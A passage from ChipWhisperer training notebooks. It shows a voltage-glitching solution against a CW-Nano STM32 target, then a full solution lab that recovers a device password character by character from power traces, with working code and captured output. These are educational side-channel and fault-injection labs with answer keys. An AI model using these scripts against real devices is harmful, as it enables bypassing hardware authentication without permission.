buildtarget == allquick == to avoid full rebuild 101 | +-------------------------------------------------------- 102 | +-------------------------------------------------------- 103 | + Built for platform CWNANO Built-in Target (STM32F030) with: 104 | + CRYPTO\_TARGET = NONE 105 | + CRYPTO\_OPTIONS = 106 | +-------------------------------------------------------- 107 | 108 | 109 | 110 | 111 | **In [3]:** 112 | 113 | .. code:: ipython3 114 | 115 | %run "../../Setup_Scripts/Setup_Generic.ipynb" 116 | 117 | 118 | **Out [3]:** 119 | 120 | 121 | 122 | .. parsed-literal:: 123 | 124 | Serial baud rate = 38400 125 | INFO: Found ChipWhisperer😍 126 | 127 | 128 | 129 | 130 | **In [4]:** 131 | 132 | .. code:: ipython3 133 | 134 | fw_path = "../../../hardware/victims/firmware/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM) 135 | cw.program_target(scope, prog, fw_path) 136 | 137 | 138 | **Out [4]:** 139 | 140 | 141 | 142 | .. parsed-literal:: 143 | 144 | Serial baud rate = 115200 145 | Detected known STMF32: STM32F03xx4/03xx6 146 | Extended erase (0x44), this can take ten seconds or more 147 | Attempting to program 4751 bytes at 0x8000000 148 | STM32F Programming flash... 149 | STM32F Reading flash... 150 | Verified flash OK, 4751 bytes 151 | Serial baud rate = 38400 152 | 153 | 154 | 155 | 156 | **In [5]:** 157 | 158 | .. code:: ipython3 159 | 160 | scope.io.clkout = 7.5E6 161 | target.baud = 38400*7.5/7.37 162 | def reboot_flush(): 163 | scope.io.nrst = False 164 | time.sleep(0.05) 165 | scope.io.nrst = "high_z" 166 | time.sleep(0.05) 167 | #Flush garbage too 168 | target.flush() 169 | 170 | 171 | **Out [5]:** 172 | 173 | 174 | 175 | .. parsed-literal:: 176 | 177 | Serial baud rate = 39077.34056987788 178 | 179 | 180 | 181 | 182 | **In [6]:** 183 | 184 | .. code:: ipython3 185 | 186 | #Do glitch loop 187 | reboot_flush() 188 | pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68]) 189 | target.simpleserial_write('p', pw) 190 | 191 | val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check 192 | valid = val['valid'] 193 | if valid: 194 | response = val['payload'] 195 | raw_serial = val['full_response'] 196 | error_code = val['rv'] 197 | 198 | print(val) 199 | 200 | 201 | **Out [6]:** 202 | 203 | 204 | 205 | .. parsed-literal:: 206 | 207 | {'valid': True, 'payload': CWbytearray(b'01'), 'full\_response': 'r01\n', 'rv': 1} 208 | 209 | 210 | 211 | 212 | **In [7]:** 213 | 214 | .. code:: ipython3 215 | 216 | import matplotlib.pylab as plt 217 | import chipwhisperer.common.results.glitch as glitch 218 | gc = glitch.GlitchController(groups=["success", "reset", "normal"], parameters=["repeat", "ext_offset"]) 219 | gc.display_stats() 220 | 221 | 222 | **Out [7]:** 223 | 224 | 225 | 226 | 227 | 228 | 229 | 230 | 231 | 232 | 233 | 234 | 235 | **In [8]:** 236 | 237 | .. code:: ipython3 238 | 239 | %matplotlib inline 240 | import matplotlib.pylab as plt 241 | fig = plt.figure() 242 | 243 | 244 | **Out [8]:** 245 | 246 | 247 | .. parsed-literal:: 248 | 249 |
250 | 251 | 252 | 253 | **In [9]:** 254 | 255 | .. code:: ipython3 256 | 257 | from importlib import reload 258 | import chipwhisperer.common.results.glitch as glitch 259 | from tqdm.notebook import tqdm 260 | import re 261 | import struct 262 | 263 | g_step = 1 264 | 265 | gc.set_global_step(g_step) 266 | gc.set_range("repeat", 1, 7) 267 | gc.set_range("ext_offset", 1, 30) 268 | 269 | gc.set_global_step(1) 270 | 271 | reboot_flush() 272 | sample_size = 1 273 | scope.glitch.repeat = 0 274 | broken = False 275 | 276 | for glitch_settings in gc.glitch_values(): 277 | scope.glitch.repeat = glitch_settings[0] 278 | scope.glitch.ext_offset = glitch_settings[1] 279 | if broken: 280 | break 281 | for i in range(5): 282 | scope.arm() 283 | target.simpleserial_write('p', bytearray([0]*5)) 284 | ret = scope.capture() 285 | 286 | val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check 287 | if ret: 288 | print('Timeout - no trigger') 289 | gc.add("reset", (scope.glitch.repeat, scope.glitch.ext_offset)) 290 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, 'xr', alpha=1) 291 | fig.canvas.draw() 292 | 293 | #Device is slow to boot? 294 | reboot_flush() 295 | 296 | else: 297 | if val['valid'] is False: 298 | gc.add("reset", (scope.glitch.repeat, scope.glitch.ext_offset)) 299 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, 'xr', alpha=1) 300 | fig.canvas.draw() 301 | reboot_flush() 302 | else: 303 | if val['rv'] == 1: #for loop check 304 | broken = True 305 | gc.add("success", (scope.glitch.repeat, scope.glitch.ext_offset)) 306 | print(val) 307 | print(val['payload']) 308 | print(scope.glitch.repeat, scope.glitch.ext_offset) 309 | print("🐙", end="") 310 | plt.plot(scope.glitch.ext_offset, scope.glitch.repeat, '+g', alpha=1) 311 | fig.canvas.draw() 312 | break 313 | else: 314 | gc.add("normal", (scope.glitch.repeat, scope.glitch.ext_offset)) 315 | 316 | 317 | **Out [9]:** 318 | 319 | 320 | 321 | .. parsed-literal:: 322 | 323 | {'valid': True, 'payload': CWbytearray(b'01'), 'full\_response': 'r01\n', 'rv': 1} 324 | CWbytearray(b'01') 325 | 5 9 326 | 🐙 327 | 328 | 329 | 330 | .. image:: img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_1.png 331 | 332 | 333 | 334 | **In [10]:** 335 | 336 | .. code:: ipython3 337 | 338 | scope.dis() 339 | target.dis() 340 | 341 | 342 | **In [11]:** 343 | 344 | .. code:: ipython3 345 | 346 | assert broken is True 347 | -------------------------------------------------------------------------------- /courses_sca101_SOLN_Lab 2_1B - Power Analysis for Password Bypass-CWNANO-CWNANO.rst: -------------------------------------------------------------------------------- 1 | SOLUTION WITH SIMULATION: Part 2, Topic 1, Lab B: Power Analysis for Password Bypass 2 | ==================================================================================== 3 | 4 | 5 | 6 | **SUMMARY:** *This tutorial will introduce you to breaking devices by 7 | determining when a device is performing certain operations. Our target 8 | device will be performing a simple password check, and we will 9 | demonstrate how to perform a basic power analysis.* 10 | 11 | **LEARNING OUTCOMES:** 12 | 13 | - How power can be used to determine timing information. 14 | - Plotting multiple iterations while varying input data to find 15 | interesting locations. 16 | - Using difference of waveforms to find interesting locations. 17 | - Performing power captures with ChipWhisperer hardware (hardware only) 18 | 19 | Prerequisites 20 | ------------- 21 | 22 | Hold up! Before you continue, check you’ve done the following tutorials: 23 | 24 | - ☑ Jupyter Notebook Intro (you should be OK with plotting & running 25 | blocks). 26 | - ☑ SCA101 Intro (you should have an idea of how to get 27 | hardware-specific versions running). 28 | 29 | Power Trace Gathering 30 | --------------------- 31 | 32 | At this point you’ve got to insert code to perform the power trace 33 | capture. There are two options here: \* Capture from physical device. \* 34 | Read from a file. 35 | 36 | You get to choose your adventure - see the two notebooks with the same 37 | name of this, but called ``(SIMULATED)`` or ``(HARDWARE)`` to continue. 38 | Inside those notebooks you should get some code to copy into the 39 | following section, which will define the capture function. 40 | 41 | Be sure you get the ``"✔️ OK to continue!"`` print once you run the next 42 | cell, otherwise things will fail later on! 43 | 44 | Choose your setup options here: 45 | 46 | 47 | **In [1]:** 48 | 49 | .. code:: ipython3 50 | 51 | SCOPETYPE = 'CWNANO' 52 | PLATFORM = 'CWNANO' 53 | VERSION = 'HARDWARE' 54 | 55 | 56 | **In [2]:** 57 | 58 | .. code:: ipython3 59 | 60 | if VERSION == 'HARDWARE': 61 | %run "Lab 2_1B - Power Analysis for Password Bypass (HARDWARE).ipynb" 62 | elif VERSION == 'SIMULATED': 63 | %run "Lab 2_1B - Power Analysis for Password Bypass (SIMULATED).ipynb" 64 | 65 | 66 | **Out [2]:** 67 | 68 | 69 | 70 | .. parsed-literal:: 71 | 72 | SS\_VER set to SS\_VER\_1\_0 73 | rm -f -- basic-passwdcheck-CWNANO.hex 74 | rm -f -- basic-passwdcheck-CWNANO.eep 75 | rm -f -- basic-passwdcheck-CWNANO.cof 76 | rm -f -- basic-passwdcheck-CWNANO.elf 77 | rm -f -- basic-passwdcheck-CWNANO.map 78 | rm -f -- basic-passwdcheck-CWNANO.sym 79 | rm -f -- basic-passwdcheck-CWNANO.lss 80 | rm -f -- objdir/\*.o 81 | rm -f -- objdir/\*.lst 82 | rm -f -- basic-passwdcheck.s simpleserial.s stm32f0\_hal\_nano.s stm32f0\_hal\_lowlevel.s 83 | rm -f -- basic-passwdcheck.d simpleserial.d stm32f0\_hal\_nano.d stm32f0\_hal\_lowlevel.d 84 | rm -f -- basic-passwdcheck.i simpleserial.i stm32f0\_hal\_nano.i stm32f0\_hal\_lowlevel.i 85 | . 86 | Welcome to another exciting ChipWhisperer target build!! 87 | arm-none-eabi-gcc.exe (GNU Arm Embedded Toolchain 9-2020-q2-update) 9.3.1 20200408 (release) 88 | Copyright (C) 2019 Free Software Foundation, Inc. 89 | This is free software; see the source for copying conditions. There is NO 90 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 91 | 92 | . 93 | Compiling C: basic-passwdcheck.c 94 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_0 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/basic-passwdcheck.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/basic-passwdcheck.o.d basic-passwdcheck.c -o objdir/basic-passwdcheck.o 95 | . 96 | Compiling C: .././simpleserial/simpleserial.c 97 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_0 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/simpleserial.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/simpleserial.o.d .././simpleserial/simpleserial.c -o objdir/simpleserial.o 98 | . 99 | Compiling C: .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c 100 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_0 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_nano.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_nano.o.d .././hal/stm32f0\_nano/stm32f0\_hal\_nano.c -o objdir/stm32f0\_hal\_nano.o 101 | . 102 | Compiling C: .././hal/stm32f0/stm32f0\_hal\_lowlevel.c 103 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_0 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/stm32f0\_hal\_lowlevel.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/stm32f0\_hal\_lowlevel.o.d .././hal/stm32f0/stm32f0\_hal\_lowlevel.c -o objdir/stm32f0\_hal\_lowlevel.o 104 | . 105 | Assembling: .././hal/stm32f0/stm32f0\_startup.S 106 | arm-none-eabi-gcc -c -mcpu=cortex-m0 -I. -x assembler-with-cpp -mthumb -mfloat-abi=soft -ffunction-sections -DF\_CPU=7372800 -Wa,-gstabs,-adhlns=objdir/stm32f0\_startup.lst -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ .././hal/stm32f0/stm32f0\_startup.S -o objdir/stm32f0\_startup.o 107 | . 108 | Linking: basic-passwdcheck-CWNANO.elf 109 | arm-none-eabi-gcc -mcpu=cortex-m0 -I. -mthumb -mfloat-abi=soft -ffunction-sections -gdwarf-2 -DSS\_VER=SS\_VER\_1\_0 -DSTM32F030x6 -DSTM32F0 -DSTM32 -DDEBUG -DHAL\_TYPE=HAL\_stm32f0\_nano -DPLATFORM=CWNANO -DF\_CPU=7372800UL -Os -funsigned-char -funsigned-bitfields -fshort-enums -Wall -Wstrict-prototypes -Wa,-adhlns=objdir/basic-passwdcheck.o -I.././simpleserial/ -I.././hal -I.././hal/stm32f0 -I.././hal/stm32f0/CMSIS -I.././hal/stm32f0/CMSIS/core -I.././hal/stm32f0/CMSIS/device -I.././hal/stm32f0/Legacy -I.././crypto/ -std=gnu99 -MMD -MP -MF .dep/basic-passwdcheck-CWNANO.elf.d objdir/basic-passwdcheck.o objdir/simpleserial.o objdir/stm32f0\_hal\_nano.o objdir/stm32f0\_hal\_lowlevel.o objdir/stm32f0\_startup.o --output basic-passwdcheck-CWNANO.elf --specs=nano.specs --specs=nosys.specs -T .././hal/stm32f0\_nano/LinkerScript.ld -Wl,--gc-sections -lm -mthumb -mcpu=cortex-m0 -Wl,-Map=basic-passwdcheck-CWNANO.map,--cref -lm 110 | . 111 | Creating load file for Flash: basic-passwdcheck-CWNANO.hex 112 | arm-none-eabi-objcopy -O ihex -R .eeprom -R .fuse -R .lock -R .signature basic-passwdcheck-CWNANO.elf basic-passwdcheck-CWNANO.hex 113 | . 114 | Creating load file for EEPROM: basic-passwdcheck-CWNANO.eep 115 | arm-none-eabi-objcopy -j .eeprom --set-section-flags=.eeprom="alloc,load" \ 116 | --change-section-lma .eeprom=0 --no-change-warnings -O ihex basic-passwdcheck-CWNANO.elf basic-passwdcheck-CWNANO.eep \|\| exit 0 117 | . 118 | Creating Extended Listing: basic-passwdcheck-CWNANO.lss 119 | arm-none-eabi-objdump -h -S -z basic-passwdcheck-CWNANO.elf > basic-passwdcheck-CWNANO.lss 120 | . 121 | Creating Symbol Table: basic-passwdcheck-CWNANO.sym 122 | arm-none-eabi-nm -n basic-passwdcheck-CWNANO.elf > basic-passwdcheck-CWNANO.sym 123 | Size after: 124 | text data bss dec hex filename 125 | 9848 112 1200 11160 2b98 basic-passwdcheck-CWNANO.elf 126 | +-------------------------------------------------------- 127 | + Default target does full rebuild each time. 128 | + Specify buildtarget == allquick == to avoid full rebuild 129 | +-------------------------------------------------------- 130 | +-------------------------------------------------------- 131 | + Built for platform CWNANO Built-in Target (STM32F030) with: 132 | + CRYPTO\_TARGET = NONE 133 | + CRYPTO\_OPTIONS = AES128C 134 | +-------------------------------------------------------- 135 | 136 | 137 | 138 | 139 | 140 | .. parsed-literal:: 141 | 142 | .././simpleserial/simpleserial.c: In function 'simpleserial\_get': 143 | .././simpleserial/simpleserial.c:131:10: warning: variable 'ret' set but not used [-Wunused-but-set-variable] 144 | 131 \| uint8\_t ret[1]; 145 | \| ^~~ 146 | 147 | 148 | 149 | 150 | 151 | .. parsed-literal:: 152 | 153 | Serial baud rate = 38400 154 | INFO: Found ChipWhisperer😍 155 | Serial baud rate = 115200 156 | Detected known STMF32: STM32F03xx4/03xx6 157 | Extended erase (0x44), this can take ten seconds or more 158 | Attempting to program 9959 bytes at 0x8000000 159 | STM32F Programming flash... 160 | STM32F Reading flash... 161 | Verified flash OK, 9959 bytes 162 | Serial baud rate = 38400 163 | 164 | 165 | 166 | 167 | **In [3]:** 168 | 169 | .. code:: ipython3 170 | 171 | trace_test = cap_pass_trace("h\n") 172 | 173 | #Basic sanity check 174 | assert(len(trace_test) == 3000) 175 | print("✔️ OK to continue!") 176 | 177 | 178 | **Out [3]:** 179 | 180 | 181 | 182 | .. parsed-literal:: 183 | 184 | WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred. 185 | 186 | 187 | 188 | 189 | 190 | .. parsed-literal:: 191 | 192 | ✔️ OK to continue! 193 | 194 | 195 | 196 | Exploration 197 | ----------- 198 | 199 | So what can we do with this? While first off - I’m going to cheat, and 200 | tell you that we have a preset password that starts with ``h``, and it’s 201 | 5 characters long. But that’s the only hint so far - what can you do? 202 | While first off, let’s try plotting a comparison of ``h`` to something 203 | else. 204 | 205 | If you need a reminder of how to do a plot - see the matplotlib section 206 | of the **Jupyter Introduction** notebook. 207 | 208 | The following cell shows you how to capture one power trace with ``h`` 209 | sent as a password. From there: 210 | 211 | 1. Try adding the plotting code and see what it looks like. 212 | 2. Send different passwords to the device. We’re only going to look at 213 | the difference between a password starting with ``h`` and something 214 | else right now. 215 | 3. Plot the different waveforms. 216 | 217 | 218 | **In [4]:** 219 | 220 | .. code:: ipython3 221 | 222 | #Example - capture 'h' - end with newline '\n' as serial protocol expects that 223 | trace_h = cap_pass_trace("h\n") 224 | 225 | print(trace_h) 226 | 227 | # ################### 228 | # START SOLUTION 229 | # ################### 230 | %matplotlib inline 231 | import matplotlib.pyplot as plt 232 | plt.figure() 233 | plt.plot(cap_pass_trace("h\n")) 234 | plt.plot(cap_pass_trace("0\n")) 235 | plt.show() 236 | # ################### 237 | # END SOLUTION 238 | # ################### 239 | 240 | 241 | **Out [4]:** 242 | 243 | 244 | 245 | .. parsed-literal:: 246 | 247 | [-0.0078125 0.08203125 0.01953125 ... -0.26953125 0.01171875 248 | 0.08203125] 249 | 250 | 251 | 252 | 253 | 254 | .. parsed-literal:: 255 | 256 | WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred. 257 | 258 | 259 | 260 | 261 | .. image:: img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png 262 | 263 | 264 | For reference, the output should look something like this: 265 | 266 | If you are using the ``%matplotlib notebook`` magic, you can zoom in at 267 | the start. What you want to notice is there is two code paths taken, 268 | depending on a correct or incorrect path. Here for example is a correct 269 | & incorrect character processed: 270 | 271 | OK interesting – what’s next? Let’s plot every possible password 272 | character we could send. 273 | 274 | Our password implementation only recognizes characters in the list 275 | ``abcdefghijklmnopqrstuvwxyz0123456789``, so we’re going to limit it to 276 | those valid characters for now. 277 | 278 | Write some code in the following block that implements the following 279 | algorithm: 280 | 281 | :: 282 | 283 | for CHARACTER in LIST_OF_VALID_CHARACTERS: 284 | trace = cap_pass_trace(CHARACTER + "\n") 285 | plot(trace) 286 | 287 | 288 | The above isn’t quite valid code - so massage it into place! You also 289 | may notice the traces are way too long - you might want to make a more 290 | narrow plot that only does the first say 500 samples of the power trace. 291 | 292 | 293 | **In [5]:** 294 | 295 | .. code:: ipython3 296 | 297 | # ################### 298 | # START SOLUTION 299 | # ################### 300 | from tqdm.notebook import tqdm 301 | plt.figure() 302 | for c in tqdm('abcdefghijklmnopqrstuvwxyz0123456789'): 303 | trace = cap_pass_trace(c + "\n") 304 | plt.plot(trace[0:500]) 305 | 306 | # ################### 307 | # END SOLUTION 308 | # ################### 309 | 310 | 311 | **Out [5]:** 312 | 313 | 314 | 315 | 316 | 317 | .. parsed-literal:: 318 | 319 | WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred. 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | .. image:: img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png 328 | 329 | 330 | The end result should be if you zoom in, you’ll see there is a location 331 | where a single “outlier” trace doesn’t follow the path of all the other 332 | traces. That is great news, since it means we learn something about the 333 | system from power analysis. 334 | 335 | Using your loop - you can also try modifying the analysis to capture a 336 | correct “first” character, and then every other wrong second character. 337 | Do you see a difference you might be able to detect? 338 | 339 | The pseudo-code would look something like this: 340 | 341 | :: 342 | 343 | for CHARACTER in LIST_OF_VALID_CHARACTERS: 344 | trace = cap_pass_trace("h" + CHARACTER + "\n") 345 | plot(trace) 346 | 347 | Give that a shot in your earlier code-block, and then let’s try and 348 | automate this attack to understand the data a little better. 349 | 350 | Automating an Attack against One Character 351 | ------------------------------------------ 352 | 353 | To start with - we’re going to automate an attack against a **single** 354 | character of the password. Since we don’t know the password (let’s 355 | assume), we’ll use a strategy of comparing all possible inputs together. 356 | 357 | An easy way to do this might be to use something that we know can’t be 358 | part of the valid password. As long as it’s processed the same way, this 359 | will work just fine. So for now, let’s use a password as ``0x00`` (i.e., 360 | a null byte). We can compare the null byte to processing something else: 361 | 362 | 363 | **In [6]:** 364 | 365 | .. code:: ipython3 366 | 367 | %matplotlib inline 368 | import matplotlib.pylab as plt 369 | 370 | plt.figure() 371 | ref_trace = cap_pass_trace("\x00\n")[0:500] 372 | plt.plot(ref_trace) 373 | other_trace = cap_pass_trace("c\n")[0:500] 374 | plt.plot(other_trace) 375 | plt.show() 376 | 377 | 378 | **Out [6]:** 379 | 380 | 381 | 382 | .. parsed-literal:: 383 | 384 | WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred. 385 | 386 | 387 | 388 | 389 | .. image:: img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png 390 | 391 | 392 | This will plot a trace with an input of “:raw-latex:`\x00`” - a null 393 | password! This is an invalid character, and seems to be processed as any 394 | other invalid password. 395 | 396 | Let’s make this a little more obvious, and plot the difference between a 397 | known reference & every other capture. You need to write some code that 398 | does something like this: 399 | 400 | :: 401 | 402 | ref_trace = cap_pass_trace( "\x00\n") 403 | 404 | for CHARACTER in LIST_OF_VALID_CHARACTERS: 405 | trace = cap_pass_trace(CHARACTER + "\n") 406 | plot(trace - ref_trace) 407 | 408 | Again, you may need to modify this a little bit such as adding code to 409 | make a new ``figure()``. Also notice in the above example how I reduced 410 | the number of samples. 411 | 412 | 413 | **In [7]:** 414 | 415 | .. code:: ipython3 416 | 417 | # ################### 418 | # START SOLUTION 419 | # ################### 420 | 421 | %matplotlib inline 422 | import matplotlib.pylab as plt 423 | 424 | plt.figure() 425 | ref_trace = cap_pass_trace("h0p\x00\n")[0:500] 426 | 427 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 428 | trace = cap_pass_trace('h0p' + c + "\n")[0:500] 429 | plt.plot(trace - ref_trace) 430 | 431 | # ################### 432 | # END SOLUTION 433 | # ################### 434 | 435 | 436 | 437 | **Out [7]:** 438 | 439 | 440 | 441 | .. parsed-literal:: 442 | 443 | WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred. 444 | 445 | 446 | 447 | 448 | .. image:: img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png 449 | 450 | 451 | OK great - hopefully you now see one major “difference”. It should look 452 | something like this: 453 | 454 | What do do now? Let’s make this thing automatically detect such a large 455 | difference. Some handy stuff to try out is the ``np.sum()`` and 456 | ``np.abs()`` function. 457 | 458 | The first one will get absolute values: 459 | 460 | .. code:: python 461 | 462 | import numpy as np 463 | np.abs([-1, -3, 1, -5, 6]) 464 | 465 | Out[]: array([1, 3, 1, 5, 6]) 466 | 467 | The second one will add up all the numbers. 468 | 469 | .. code:: python 470 | 471 | import numpy as np 472 | np.sum([-1, -3, 1, -5, 6]) 473 | 474 | Out[]: -2 475 | 476 | Using just ``np.sum()`` means positive and negative differences will 477 | cancel each other out - so it’s better to do something like 478 | ``np.sum(np.abs(DIFF))`` to get a good number indicating how “close” the 479 | match was. 480 | 481 | 482 | **In [8]:** 483 | 484 | .. code:: ipython3 485 | 486 | import numpy as np 487 | np.abs([-1, -3, 1, -5, 6]) 488 | 489 | 490 | **Out [8]:** 491 | 492 | 493 | 494 | .. parsed-literal:: 495 | 496 | array([1, 3, 1, 5, 6]) 497 | 498 | 499 | 500 | 501 | **In [9]:** 502 | 503 | .. code:: ipython3 504 | 505 | import numpy as np 506 | np.sum([-1, -3, 1, -5, 6]) 507 | 508 | 509 | **Out [9]:** 510 | 511 | 512 | 513 | .. parsed-literal:: 514 | 515 | -2 516 | 517 | 518 | 519 | 520 | **In [10]:** 521 | 522 | .. code:: ipython3 523 | 524 | np.sum(np.abs([-1, -3, 1, -5, 6])) 525 | 526 | 527 | **Out [10]:** 528 | 529 | 530 | 531 | .. parsed-literal:: 532 | 533 | 16 534 | 535 | 536 | 537 | Taking your above loop, modify it to print an indicator of how closely 538 | this matches your trace. Something like the following should work: 539 | 540 | :: 541 | 542 | ref_trace = cap_pass_trace( "\x00\n") 543 | 544 | for CHARACTER in LIST_OF_VALID_CHARACTERS: 545 | trace = cap_pass_trace(CHARACTER + "\n") 546 | diff = SUM(ABS(trace - ref_trace)) 547 | 548 | print("{:1} diff = {:2}".format(CHARACTER, diff)) 549 | 550 | 551 | **In [11]:** 552 | 553 | .. code:: ipython3 554 | 555 | # ################### 556 | # START SOLUTION 557 | # ################### 558 | 559 | ref_trace = cap_pass_trace( "h0p\x00\n") 560 | 561 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 562 | trace = cap_pass_trace("h0p" + c + "\n") 563 | diff = np.sum(np.abs(trace - ref_trace)) 564 | 565 | print("{:1} diff = {:2}".format(c, diff)) 566 | 567 | # ################### 568 | # END SOLUTION 569 | # ################### 570 | 571 | 572 | **Out [11]:** 573 | 574 | 575 | 576 | .. parsed-literal:: 577 | 578 | WARNING:root:SAM3U Serial buffers OVERRUN - data loss has occurred. 579 | 580 | 581 | 582 | 583 | 584 | .. parsed-literal:: 585 | 586 | a diff = 21.1015625 587 | b diff = 22.6171875 588 | c diff = 15.8359375 589 | d diff = 18.90625 590 | e diff = 24.23828125 591 | f diff = 19.984375 592 | g diff = 16.16796875 593 | h diff = 19.6640625 594 | i diff = 24.00390625 595 | j diff = 19.85546875 596 | k diff = 22.2109375 597 | l diff = 20.7578125 598 | m diff = 22.69140625 599 | n diff = 17.703125 600 | o diff = 22.98828125 601 | p diff = 21.359375 602 | q diff = 22.21875 603 | r diff = 23.66015625 604 | s diff = 19.5390625 605 | t diff = 18.859375 606 | u diff = 22.8203125 607 | v diff = 21.15234375 608 | w diff = 21.60546875 609 | x diff = 78.953125 610 | y diff = 22.88671875 611 | z diff = 14.98828125 612 | 0 diff = 20.23046875 613 | 1 diff = 18.328125 614 | 2 diff = 13.66015625 615 | 3 diff = 19.80078125 616 | 4 diff = 16.67578125 617 | 5 diff = 20.9765625 618 | 6 diff = 20.765625 619 | 7 diff = 17.2890625 620 | 8 diff = 20.01953125 621 | 9 diff = 19.30078125 622 | 623 | 624 | 625 | Now the easy part - modify your above code to automatically print the 626 | correct password character. This should be done with a comparison of the 627 | ``diff`` variable - based on the printed characters, you should see one 628 | that is ‘higher’ than the others. Set a threshold somewhere reasonable 629 | (say I might use ``25.0`` based on one run). 630 | 631 | Running a Full Attack 632 | --------------------- 633 | 634 | Finally - let’s finish this off. Rather than attacking a single 635 | character, we need to attack each character in sequence. 636 | 637 | If you go back to the plotting of differences, you can try using the 638 | correct first character & wrong second character. The basic idea is 639 | exactly the same as before, but now we loop through 5 times, and just 640 | build up the password based on brute-forcing each character. 641 | 642 | Take a look at the following for the basic pseudo-code: 643 | 644 | :: 645 | 646 | guessed_pw = "" #Store guessed password so far 647 | 648 | do a loop 5 times (max password size): 649 | 650 | ref_trace = capture power trace(guessed_pw + "\x00\n") 651 | 652 | for CHARACTER in LIST_OF_VALID_CHARACTERS: 653 | trace = capture power trace (guessed_pw + CHARACTER + newline) 654 | diff = SUM(ABS(trace - ref_trace)) 655 | 656 | if diff > THRESHOLD: 657 | 658 | guessed_pwd += c 659 | print(guessed_pw) 660 | 661 | break 662 | 663 | 664 | **In [12]:** 665 | 666 | .. code:: ipython3 667 | 668 | # ################### 669 | # START SOLUTION 670 | # ################### 671 | 672 | guessed_pw = "" 673 | 674 | 675 | for _ in range(0, 5): 676 | 677 | ref_trace = cap_pass_trace(guessed_pw + "\x00\n") 678 | 679 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 680 | trace = cap_pass_trace(guessed_pw + c + "\n") 681 | diff = np.sum(np.abs(trace - ref_trace)) 682 | 683 | if diff > 40.0: 684 | guessed_pw += c 685 | print(guessed_pw) 686 | break 687 | 688 | # ################### 689 | # END SOLUTION 690 | # ################### 691 | 692 | 693 | **Out [12]:** 694 | 695 | 696 | 697 | .. parsed-literal:: 698 | 699 | h 700 | h0 701 | h0p 702 | h0px 703 | h0px3 704 | 